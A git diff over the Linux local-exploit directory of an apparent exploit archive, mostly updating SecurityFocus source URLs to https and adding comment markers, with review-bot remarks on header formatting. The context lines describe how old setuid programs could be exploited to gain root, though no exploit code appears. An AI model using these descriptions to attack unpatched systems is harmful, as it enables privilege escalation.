@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1206/info +source: https://www.securityfocus.com/bid/1206/info Some linux distributions (S.u.S.E. 6.4 reported) ship with kscd (a CD player for the KDE Desktop) sgid disk. kscd uses the contents of the 'SHELL' environment variable to execute a browser. This makes it possible to obtain a sgid 'disk' shell. Using these privileges along with code provided in the exploit, it is possible to change attributes on raw disks. This in turns allows an attacker to create a root shell, thus compromising the intergrity of the machine. diff --git a/exploits/linux/local/19925.c b/exploits/linux/local/19925.c index 2d5b82323..4ac48c199 100644 --- a/exploits/linux/local/19925.c +++ b/exploits/linux/local/19925.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1220/info +// source: https://www.securityfocus.com/bid/1220/info Several buffer overflow vulnerabilities exist in Kerberos 5 implmenetations due to buffer overflows in the Kerberos 4 compatability code. These include MIT Kerberos 5 releases 1.0.x, 1.1 and 1.1.1, MIT Kerberos 4 patch level 10 (and, most likely, prior releases), and Cygnus KerbNet and Network Security (CNS). The main source of problems is due to a buffer overflow in the krb_rd_req() library function. This function is used by every application that supports Kerberos 4 authentication, including, but not limited to, kshrd, klogin, telnetd, ftpd, rkinitd, v4rcp and kpopd. Therefore, it is possible for a remote attacker to exploit this vulnerability and gain root access on affected machines, or obtain root level access once local. diff --git a/exploits/linux/local/19946.txt b/exploits/linux/local/19946.txt index ab5383b95..d70c65f52 100644 --- a/exploits/linux/local/19946.txt +++ b/exploits/linux/local/19946.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1232/info +source: https://www.securityfocus.com/bid/1232/info A vulnerability exists in OpenLDAP as shipped with some versions of Linux, including RedHat 6.1 and 6.2, and TurboLinux 6.0.2 and earlier. OpenLDAP will create files in /usr/tmp, which is actually a symbolic link to the world writable /tmp directory. As OpenLDAP does not check for a files existence prior to opening the files in /usr/tmp, it is possible for an attacker to point an appropriately named symbolic link at any file on the filesystem, and cause it to be destroyed. diff --git a/exploits/linux/local/19952.c b/exploits/linux/local/19952.c index 1d56e60a6..895d0ff7e 100644 --- a/exploits/linux/local/19952.c +++ b/exploits/linux/local/19952.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1239/info +// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root. diff --git a/exploits/linux/local/19953.c b/exploits/linux/local/19953.c index 966db8cc8..97627f3bc 100644 --- a/exploits/linux/local/19953.c +++ b/exploits/linux/local/19953.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1239/info +// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root. diff --git a/exploits/linux/local/19954.c b/exploits/linux/local/19954.c index 561ab63eb..a0c7edaa7 100644 --- a/exploits/linux/local/19954.c 
+++ b/exploits/linux/local/19954.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1239/info +// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root. diff --git a/exploits/linux/local/19955.c b/exploits/linux/local/19955.c index c3202fb2f..235f9ad58 100644 --- a/exploits/linux/local/19955.c +++ b/exploits/linux/local/19955.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1242/info +// source: https://www.securityfocus.com/bid/1242/info A vulnerability exists in version 2.53 and prior of qpopper, a popular POP server, from Qualcomm. By placing machine executable code in the X-UIDL header field, supplying formatting strings in the "From:" field in a mail header, and then issuing, as the user the mail was sent to, a 'euidl' command, it is possible to execute arbitrary code. This code will execute as the user executing the euidl command, but with group 'mail' permissions on hosts running qpopper in that group. This is often done due to mail spool permissions. diff --git a/exploits/linux/local/19969.c b/exploits/linux/local/19969.c index 45e33598e..7e8ef05e1 100644 --- a/exploits/linux/local/19969.c +++ b/exploits/linux/local/19969.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1265/info +// source: https://www.securityfocus.com/bid/1265/info The linux cdrecorder binary is vulnerable to a locally exploitable buffer overflow attack. When installed in a Mandrake 7.0 linux distribution, it is by default setgid "cdburner" (which is a group, gid: 80, that is created for the application). The overflow condition is the result of no bounds checking on the 'dev=' argument passed to cdburner at execution time. This vulnerability can be exploited to execute arbitrary commands with egid "cdburner". cdburner has been verified (by the writers of the exploit) to be exploitable on an Intel linux system running Mandrake 7.0. Other distributions of linux may be vulnerable to this problem as well. diff --git a/exploits/linux/local/19970.c b/exploits/linux/local/19970.c index fc49ef267..d3387d3b5 100644 --- a/exploits/linux/local/19970.c +++ b/exploits/linux/local/19970.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1274/info +// source: https://www.securityfocus.com/bid/1274/info /usr/bin/kdesud has a DISPLAY environment variable overflow which could allow for the execution of arbitrary code. diff --git a/exploits/linux/local/19979.pl b/exploits/linux/local/19979.pl index 1d02946cc..89f0937b7 100755 --- a/exploits/linux/local/19979.pl +++ b/exploits/linux/local/19979.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1291/info +#source: https://www.securityfocus.com/bid/1291/info # #The KDE configuration-file management has a bug which could result in root compromise. # diff --git a/exploits/linux/local/19980.pl b/exploits/linux/local/19980.pl index 0e7f0c348..769866b54 100755 --- a/exploits/linux/local/19980.pl +++ b/exploits/linux/local/19980.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1291/info +#source: https://www.securityfocus.com/bid/1291/info # #The KDE configuration-file management has a bug which could result in root compromise. # 
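Review bot: the comment marker in the 19979.pl and 19980.pl hunks stays `#source:` with no space, while the C files rewritten in the same change (19969.c, 19970.c) get `// source:` with one. Since the line is being touched anyway, `# source: https://www.securityfocus.com/bid/1291/info` would keep the header format uniform and easier to match with a single pattern across the tree.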
diff --git a/exploits/linux/local/19981.sh b/exploits/linux/local/19981.sh index 0bfc8e03f..03da06c7c 100755 --- a/exploits/linux/local/19981.sh +++ b/exploits/linux/local/19981.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1291/info +#source: https://www.securityfocus.com/bid/1291/info # #The KDE configuration-file management has a bug which could result in root compromise. # diff --git a/exploits/linux/local/19991.c b/exploits/linux/local/19991.c index b69a511bb..cc19efbf2 100644 --- a/exploits/linux/local/19991.c +++ b/exploits/linux/local/19991.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1305/info +// source: https://www.securityfocus.com/bid/1305/info Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail). diff --git a/exploits/linux/local/19992.c b/exploits/linux/local/19992.c index 2261dedea..037a4f842 100644 --- a/exploits/linux/local/19992.c +++ b/exploits/linux/local/19992.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1305/info +source: https://www.securityfocus.com/bid/1305/info Some Linux distributions ship with BSD mailx 8.1.1-10 (On Slackware 7.x it can be found as /usr/bin/Mail). diff --git a/exploits/linux/local/20000.c b/exploits/linux/local/20000.c index 58702ee7d..4991f16c8 100644 --- a/exploits/linux/local/20000.c +++ b/exploits/linux/local/20000.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1322/info +source: https://www.securityfocus.com/bid/1322/info POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner. diff --git a/exploits/linux/local/20001.sh b/exploits/linux/local/20001.sh index b734844d2..8125c26db 100755 --- a/exploits/linux/local/20001.sh +++ b/exploits/linux/local/20001.sh 
@@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1322/info +#source: https://www.securityfocus.com/bid/1322/info # # POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner. diff --git a/exploits/linux/local/20004.c b/exploits/linux/local/20004.c index 4034560c6..07d59e29a 100644 --- a/exploits/linux/local/20004.c +++ b/exploits/linux/local/20004.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1330/info +// source: https://www.securityfocus.com/bid/1330/info A buffer overflow exists in the 'restore' program, part of the dump 0.4b15-1 package, distributed with RedHat Linux 6.2. By supplying a long string containing machine executable code at the prompt for a tape name, it is possible for an attacker to execute arbitrary code with root privileges. diff --git a/exploits/linux/local/20013.c b/exploits/linux/local/20013.c index 88160bc42..0af86a735 100644 --- a/exploits/linux/local/20013.c +++ b/exploits/linux/local/20013.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1346/info +// source: https://www.securityfocus.com/bid/1346/info A buffer overflow condition that could be exploited to obtain root exists in splitvt 1.6.3 and earlier. Splitvt is distributed with several Linux distributions. diff --git a/exploits/linux/local/20021.txt b/exploits/linux/local/20021.txt index 3b915ae2c..82f285c3c 100644 --- a/exploits/linux/local/20021.txt +++ b/exploits/linux/local/20021.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1367/info +source: https://www.securityfocus.com/bid/1367/info Password changes submitted to Red Hat Piranha via HTTP are insecurely passed as variables in a GET request. Unauthorized users could obtain the password by reading the httpd access log or by sniffing. diff --git a/exploits/linux/local/20024.c b/exploits/linux/local/20024.c index 20a682167..0eb36d1cd 100644 --- a/exploits/linux/local/20024.c +++ b/exploits/linux/local/20024.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1371/info +source: https://www.securityfocus.com/bid/1371/info KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf */ diff --git a/exploits/linux/local/20045.c b/exploits/linux/local/20045.c index c70cdbd6a..a4ec272d4 100644 --- a/exploits/linux/local/20045.c +++ b/exploits/linux/local/20045.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1408/info +// source: https://www.securityfocus.com/bid/1408/info A vulnerability exists in the _XAsyncReply() function of libX11. This function utilizes size information retrieved as part of a client supplied packet. This value is a signed integer. By forcing this value to be negative, it becomes possible to cause stack corruption. It is further possible to use this stack corruption to overwrite the return address on the stack. In theory, this could be used to execute arbitrary code. On systems where there are setuid X applications, such as xterm, it is possible for a local user to gain root. diff --git a/exploits/linux/local/20093.c b/exploits/linux/local/20093.c index 114aa4cf4..80cef49f0 100644 --- a/exploits/linux/local/20093.c +++ b/exploits/linux/local/20093.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1495/info +source: https://www.securityfocus.com/bid/1495/info Xconq is a multiple player strategy game available for many unix platforms. It contains a number of buffer overflow vulnerabilities including the ability to overflow stack buffers with either the DISPLAY or the USER environment variables. The Redhat Linux Xconq package installs the game with SGID 'games' privileges allowing an attacker to compromise the local 'games' group. */ diff --git a/exploits/linux/local/20141.pl b/exploits/linux/local/20141.pl index ddb30f442..e54d79e0d 100755 --- a/exploits/linux/local/20141.pl +++ b/exploits/linux/local/20141.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1547/info +source: https://www.securityfocus.com/bid/1547/info The interaction between some security checks performed by suidperl, the setuid version of perl, and the /bin/mail program creates a scenario that allows local malicious users to execute commands with root privileges. diff --git a/exploits/linux/local/20142.sh b/exploits/linux/local/20142.sh index 26802bacb..782fb2a76 100755 --- a/exploits/linux/local/20142.sh +++ b/exploits/linux/local/20142.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1547/info +source: https://www.securityfocus.com/bid/1547/info The interaction between some security checks performed by suidperl, the setuid version of perl, and the /bin/mail program creates a scenario that allows local malicious users to execute commands with root privileges. diff --git a/exploits/linux/local/20155.txt b/exploits/linux/local/20155.txt index 0fdced2b3..fc2685eb3 100644 --- a/exploits/linux/local/20155.txt +++ b/exploits/linux/local/20155.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1586/info +source: https://www.securityfocus.com/bid/1586/info A vulnerability exists in the installation of Multisoft's FlagShip 4.4 product. Some binaries are installed with world writable permissions. This may allow an attacker to alter a binary and cause other users to execute arbitrary code. diff --git a/exploits/linux/local/20160.txt b/exploits/linux/local/20160.txt index 8e1edc739..5d696d0c6 100644 --- a/exploits/linux/local/20160.txt +++ b/exploits/linux/local/20160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1599/info +source: https://www.securityfocus.com/bid/1599/info Minicom is a unix terminal program often used for communication between computers with modems. It is often installed setgid uucp, as this access is required for regular users to use certain devices on the system. Through specifying a capture-file on the command line, a file can be created with effective gid uucp and thus owned by gid uucp. Where this is a serious concern is on systems using uucp -- critical files writeable by group uucp can be overwritten by exploiting this vulnerability leading to other problems. diff --git a/exploits/linux/local/20185.c b/exploits/linux/local/20185.c index c23a9b6c7..916f50051 100644 --- a/exploits/linux/local/20185.c +++ b/exploits/linux/local/20185.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1634/info +source: https://www.securityfocus.com/bid/1634/info Conectiva 4.x/5.x,Debian 2.x,IBM AIX 3.x/4.x,Mandrake 7,RedHat 5.x/6.x,IRIX 6.x, Solaris 2.x/7/8,Turbolinux 6.x,Wirex Immunix OS 6.2 Locale Subsystem Format String diff --git a/exploits/linux/local/20250.c b/exploits/linux/local/20250.c index ad1bd99f3..0d6455276 100644 --- a/exploits/linux/local/20250.c +++ b/exploits/linux/local/20250.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1739/info +// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL traceroute are vulnerable to an interesting attack involving freeing of pointers pointing to unallocated memory. diff --git a/exploits/linux/local/20251.c b/exploits/linux/local/20251.c index 5fa08438a..ce877d73b 100644 --- a/exploits/linux/local/20251.c +++ b/exploits/linux/local/20251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1739/info +// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL traceroute are vulnerable to an interesting attack involving freeing of pointers pointing to unallocated memory. diff --git a/exploits/linux/local/20252.c b/exploits/linux/local/20252.c index ce6028e0b..d50f4ba6b 100644 --- a/exploits/linux/local/20252.c +++ b/exploits/linux/local/20252.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1739/info +// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL traceroute are vulnerable to an interesting attack involving freeing of pointers pointing to unallocated memory. diff --git a/exploits/linux/local/20285.c b/exploits/linux/local/20285.c index 7b31aa020..fbc6a50df 100644 --- a/exploits/linux/local/20285.c +++ b/exploits/linux/local/20285.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1785/info +// source: https://www.securityfocus.com/bid/1785/info A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges. diff --git a/exploits/linux/local/20291.sh b/exploits/linux/local/20291.sh index 2a1839d66..ec8e96dda 100755 --- a/exploits/linux/local/20291.sh +++ b/exploits/linux/local/20291.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1802/info +source: https://www.securityfocus.com/bid/1802/info Elm is a popular Unix mail client. A vulnerability exists in Elm's 'filter' utility which can grant an attacker access to any user's mail spool. By exploiting a race condition which exists in the creation of temporary files, an unauthorized user can delete an open temporary file and replace it with a symbolic link pointing to any other user's mail spool. The mailmessage function will then follow this link, and copy the contents of the victim's mail file to that of the attacker. The obvious result is that the attacker is able to read the victim's mail messages. diff --git a/exploits/linux/local/2031.c b/exploits/linux/local/2031.c index 781806c67..8ff297e7f 100644 --- a/exploits/linux/local/2031.c +++ b/exploits/linux/local/2031.c @@ -1,4 +1,4 @@ - /* +/* * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ * * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) diff --git a/exploits/linux/local/20312.c b/exploits/linux/local/20312.c index 3e86a02de..682437315 100644 --- a/exploits/linux/local/20312.c +++ b/exploits/linux/local/20312.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1828/info +// source: https://www.securityfocus.com/bid/1828/info Oracle Internet Directory 2.0.6 is a pre-alpha development release, available as both an addon package and in the Oracle Database Software release 8.1.6. A vulnerability has been found in the oidldap binary within the package. diff --git a/exploits/linux/local/20316.txt b/exploits/linux/local/20316.txt index c6e3bc644..7a19031e3 100644 --- a/exploits/linux/local/20316.txt +++ b/exploits/linux/local/20316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1834/info +source: https://www.securityfocus.com/bid/1834/info lpr is a set of printing tools for unix systems. The lpr package that ships with RedHat Linux 6.2 (and possibly earlier versions) contains a vulnerability that will allow an attacker to execute arbitrary commands with the privileges of group 'lp'. diff --git a/exploits/linux/local/20338.c b/exploits/linux/local/20338.c index 3b7ec0253..1c4131e0a 100644 --- a/exploits/linux/local/20338.c +++ b/exploits/linux/local/20338.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1872/info +// source: https://www.securityfocus.com/bid/1872/info The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access. diff --git a/exploits/linux/local/20339.sh b/exploits/linux/local/20339.sh index 0b67d555b..e2ba51ecf 100755 --- a/exploits/linux/local/20339.sh +++ b/exploits/linux/local/20339.sh 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1872/info +source: https://www.securityfocus.com/bid/1872/info The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access. diff --git a/exploits/linux/local/20341.sh b/exploits/linux/local/20341.sh index 38a942802..c200da942 100755 --- a/exploits/linux/local/20341.sh +++ b/exploits/linux/local/20341.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1874/info +source: https://www.securityfocus.com/bid/1874/info The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access. diff --git a/exploits/linux/local/20378.pl b/exploits/linux/local/20378.pl index 7897a813c..a0772d73e 100755 --- a/exploits/linux/local/20378.pl +++ b/exploits/linux/local/20378.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1895/info +source: https://www.securityfocus.com/bid/1895/info top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege. diff --git a/exploits/linux/local/20385.sh b/exploits/linux/local/20385.sh index d41d76617..81c04a110 100755 --- a/exploits/linux/local/20385.sh +++ b/exploits/linux/local/20385.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1914/info +source: https://www.securityfocus.com/bid/1914/info restore is a program for backup and recovery procedures, distributed with the RedHat Linux Operating System. A vulnerability exists that could allow a user elevated permissions. diff --git a/exploits/linux/local/20402.sh b/exploits/linux/local/20402.sh index 91b5f5221..6c7c58db5 100755 --- a/exploits/linux/local/20402.sh +++ b/exploits/linux/local/20402.sh @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/1936/info +# source: https://www.securityfocus.com/bid/1936/info # # Modutils is a component of many linux systems that includes tools for using loadable kernel modules. One of these tools, modprobe, loads a set of modules that correspond to a provided "name" (passed at the command line) automatically. Modprobe version 2.3.9 and possibly others around it contain a vulnerability (present since March 12, 1999) that can lead to a local root compromise. # diff --git a/exploits/linux/local/20411.c b/exploits/linux/local/20411.c index c2f2dac5f..3d5794ee2 100644 --- a/exploits/linux/local/20411.c +++ b/exploits/linux/local/20411.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1968/info +source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. diff --git a/exploits/linux/local/20458.txt b/exploits/linux/local/20458.txt index 69e6e21c9..a6696ea39 100644 --- a/exploits/linux/local/20458.txt +++ b/exploits/linux/local/20458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2044/info +source: https://www.securityfocus.com/bid/2044/info Ptrace is a unix system call that is used to analyze running processes, usually for breakpoint debugging. The linux implementation of ptrace in 2.2.x kernels (and possibly earlier versions) contains a vulnerability that may allow an attacker to gain sensitive information in non-readable non-setuid executable files. diff --git a/exploits/linux/local/20493.sh b/exploits/linux/local/20493.sh index 4dd92719e..8763322ec 100755 --- a/exploits/linux/local/20493.sh +++ b/exploits/linux/local/20493.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2097/info +source: https://www.securityfocus.com/bid/2097/info A vulnerability exists in several versions of University of Washington's Pico, a widely-distributed text editor shipped with most versions of Linux / Unix. diff --git a/exploits/linux/local/20517.c b/exploits/linux/local/20517.c index e28708a31..405bfd070 100644 --- a/exploits/linux/local/20517.c +++ b/exploits/linux/local/20517.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2139/info +// source: https://www.securityfocus.com/bid/2139/info Itetris, or "Intelligent Tetris", is a clone of the popular Tetris puzzle game for linux systems. The svgalib version of Itetris is installed setuid root so that it may access video hardware when run by a regular user. Itetris contains a vulnerability which may allow unprivileged users to execute arbitrary commands as root. 
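Review bot: in the 20517.c hunk only line 1 gains `//`; the description that follows as unchanged context ("Itetris, or "Intelligent Tetris", is a clone ...") is still bare prose at file scope, so the header will still stop a compiler. Wrapping the whole header in `/* ... */`, as the 20411.c hunk shows that file already does, would cover the source line and the description together.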
diff --git a/exploits/linux/local/20554.sh b/exploits/linux/local/20554.sh index 2a9931e7e..a1db10a5e 100755 --- a/exploits/linux/local/20554.sh +++ b/exploits/linux/local/20554.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2207/info +source: https://www.securityfocus.com/bid/2207/info rctab is the Run Control Tab script included with the SuSE distribution of the Linux Operating System. SuSE is a freely available, Open Source Operating system maintained by SuSE Incorporated. diff --git a/exploits/linux/local/20555.sh b/exploits/linux/local/20555.sh index 25c74f175..16ba3822a 100755 --- a/exploits/linux/local/20555.sh +++ b/exploits/linux/local/20555.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2207/info +source: https://www.securityfocus.com/bid/2207/info rctab is the Run Control Tab script included with the SuSE distribution of the Linux Operating System. SuSE is a freely available, Open Source Operating system maintained by SuSE Incorporated. diff --git a/exploits/linux/local/20556.c b/exploits/linux/local/20556.c index b0fe93c05..a925940bc 100644 --- a/exploits/linux/local/20556.c +++ b/exploits/linux/local/20556.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2210/info +// source: https://www.securityfocus.com/bid/2210/info splitvt is a VT100 window splitter, designed to allow the user two command line interfaces in one terminal window, originally written by Sam Lantinga. It is freely available, open source, and included with many variants of the Linux Operating System. diff --git a/exploits/linux/local/20581.c b/exploits/linux/local/20581.c index 9ad0bbec3..4f2c3bda0 100644 --- a/exploits/linux/local/20581.c +++ b/exploits/linux/local/20581.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2262/info +// source: https://www.securityfocus.com/bid/2262/info MySQL is a widely used Open Source database tool. Versions of MySQL up to and including 3.23.30 are vulnerable to a buffer overflow attack. 
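Review bot: 20554.sh and 20555.sh still open with a bare `source: https://www.securityfocus.com/bid/2207/info` line, while the C files changed alongside them (20556.c, 20581.c) get a `//` prefix. Both scripts are mode 100755, so a shell reading them would treat `source:` as a command name on line 1. Prefixing the line with `# `, as 20402.sh does, would bring the scripts in line with the treatment the C files received.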
diff --git a/exploits/linux/local/20604.sh b/exploits/linux/local/20604.sh index fad81df3e..2e4cdc4da 100755 --- a/exploits/linux/local/20604.sh +++ b/exploits/linux/local/20604.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2327/info +source: https://www.securityfocus.com/bid/2327/info man is the manual page viewing program, available with the Linux Operating System in this implementation. It is freely distributed and openly maintained. diff --git a/exploits/linux/local/20626.c b/exploits/linux/local/20626.c index 4ad3d7dd7..f3e517892 100644 --- a/exploits/linux/local/20626.c +++ b/exploits/linux/local/20626.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2364/info +source: https://www.securityfocus.com/bid/2364/info The Linux Kernel is the core of the Linux Operating System. It was originally written by Linus Torvalds, and is publicly maintained. diff --git a/exploits/linux/local/20645.c b/exploits/linux/local/20645.c index 9b74fd7de..fb4a48c48 100644 --- a/exploits/linux/local/20645.c +++ b/exploits/linux/local/20645.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2403/info +// source: https://www.securityfocus.com/bid/2403/info There is a buffer overflow in elm 2.5 PL3. This overflow is accessible by passing a long string to the -f (Alternative-Folder) command-line option. This vulnerability may not be restricted to this version of elm. diff --git a/exploits/linux/local/20691.txt b/exploits/linux/local/20691.txt index 942993a95..1466c9fa5 100644 --- a/exploits/linux/local/20691.txt +++ b/exploits/linux/local/20691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2498/info +source: https://www.securityfocus.com/bid/2498/info FTPFS is a Linux kernel module allowing users to mount remote files from any standard FTP server as a local filesystem. diff --git a/exploits/linux/local/20720.c b/exploits/linux/local/20720.c index aab2e8745..9e91e2fd8 100644 --- a/exploits/linux/local/20720.c 
+++ b/exploits/linux/local/20720.c @@ -1,7 +1,7 @@ /* EDB Note: Updated exploit can be found here: https://www.exploit-db.com/exploits/20721/ -source: http://www.securityfocus.com/bid/2529/info +source: https://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. diff --git a/exploits/linux/local/20721.c b/exploits/linux/local/20721.c index 4f39c3999..0a5321a31 100644 --- a/exploits/linux/local/20721.c +++ b/exploits/linux/local/20721.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2529/info +source: https://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. diff --git a/exploits/linux/local/20776.c b/exploits/linux/local/20776.c index 16fc7bd32..b568dcccb 100644 --- a/exploits/linux/local/20776.c +++ b/exploits/linux/local/20776.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2617/info +// source: https://www.securityfocus.com/bid/2617/info Samba is a flexible file sharing packaged maintained by the Samba development group. It provides interoperatability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services. diff --git a/exploits/linux/local/20777.c b/exploits/linux/local/20777.c index 6d68461f9..7d8e36f70 100644 --- a/exploits/linux/local/20777.c +++ b/exploits/linux/local/20777.c 